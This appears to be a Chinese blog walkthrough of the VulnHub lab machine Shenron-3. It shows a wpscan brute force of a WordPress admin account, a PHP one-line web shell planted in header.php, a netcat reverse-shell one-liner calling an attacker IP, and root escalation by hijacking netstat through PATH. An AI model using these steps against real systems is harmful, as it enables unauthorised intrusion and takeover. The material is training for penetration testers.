1.靶机简介
这个靶机是Shenron系列的第三部
靶机名称:Shenron-3;
下载地址为:https://download.vulnhub.com/shenron/shenron-3.ova
2.主机发现
nmap -sP 192.168.204.0/24
nmap -sC -sV -p- 192.168.204.132
使用nmap扫描得知靶机的ip地址为:192.168.204.132;靶机开通了80端口,开启了http服务,网站是由WordPress搭建的。
3.开始攻击
我们修改一下hosts文件,然后访问这个网站。
没有发现留言板之类可以用户上传的板块。我们使用gobuster来扫描一下网站的目录,尝试找突破点。
Gobuster这款工具基于Go编程语言开发,广大研究人员可使用该工具来对目录、文件、DNS和VHost等对象进行暴力破解攻击。
Gobuster可爆破的对象包括:
1、目标站点中的URI(目录或文件);
2、DNS子域名(支持通配符);
3、目标Web服务器的虚拟主机名(VHost);
```
gobuster dir -u http://shenron/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php
```
wp-login.php应该是后台的登录界面,我们访问后台使用用户名admin,密码admin等弱密码尝试登录。
当用户名为admin的时候,给出的提示是“您为用户名admin输入的密码不正确”这说明admin这个用户可能是存在的。既然网站是用WordPress搭建的,我们尝试使用wpscan爆破一下密码。
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。WordPress是全球流行的博客网站,全球有上百万人使用它来搭建博客。
wpscan --url http://shenron --passwords /usr/share/wordlists/rockyou.txt --usernames admin
--url指定网址; --passwords 指定爆破字典 --usernames指定用户名
成功爆破出后台的登录页面,用户名为admin,密码为iloverockyou,我们成功以管理员的身份登录,所以我要做的第一件事就是检测我是否可以上传PHP文件,或者编辑后台的PHP代码。我们进入后台的editor编辑器中,发现似乎可以修改header.php,在PHP代码中加入一句话木马echo system($_REQUEST['cmd']);
我们验证一下一句话木马是否能用
我们尝试获取一个反弹Shell,这里使用burpsuite抓包、发包以及对命令进行编码。
我们在pentestmonkey中找到netcat使用反弹Shell的代码,将其使用URL编码,同时在kail攻击机中使用netcat监听1234端口rlwrap nc -lnvp 1234 成功获得反弹Shell。
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.204.130 1234 >/tmp/f
我们对反弹Shell进行优化
export TERM=xterm
python3 -c 'import pty; pty.spawn("/bin/bash")'
4.提权
既然我们拿到了www-data用户的权限,我们可以尝试进行提权最终来获取到root的权限。
首先我们看一下www-data用户的目录下的文件,看一下有没有什么有用的信息。
在wp-config.php文件中,通过筛选“user”和“pass”关键字,查找到一个密码“Wordpress@123”,查看home目录发现有一个shenron用户,我们尝试切换到shenron用户,使用密码Wordpress@123,但是没有成功。又尝试一下使用刚刚后台管理员的密码“iloverockyou”成功切换到shenron用户。
我们进入/home/shenron目录,查看一下里面的文件,发现一个名为“network”的可以执行程序,它的属主和属组都是root。
我们使用kali端搭建简单的http服务器,使用靶机下载pspy64,我们可以使用pspy来查看在network运行之后执行的操作。
pspy 是一个命令行工具,它可以在不需要 root 权限的情况下查看后台进程。它允许您在执行时查看其他用户运行的命令、cron 作业等。非常适合在 CTF 中枚举 Linux 系统。
我们给pspy64添加可执行权限,然后执行network之后再执行pspy64查看后台程序的运行情况。
我们发现在network运行的时候,会同时调用netstat,我们可以在tmp目录下创建一个netstat文件并写入"/bin/bash -p",给其添加可执行权限后,再修改PATH改为tmp目录下我们新创建的netstat文件。这样在运行network程序的时候,可以调用我们修改后的netstat文件
我们执行network程序,发现我们成功拿到了root权限,进入root目录,拿到flag!
先讲个笑话,刚刚打完MAR DASCTF明御攻防赛,一如往常,很轻松便拿到了两个flag(签到与问卷),哈哈,一个脑细胞都不用消耗 好了下面通过其中的一道misc题,一起学习一下伪加密与图片隐写的破解 本文知识点: 遇到加密压缩文件怎么办?需要哪些工具 遇到图…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论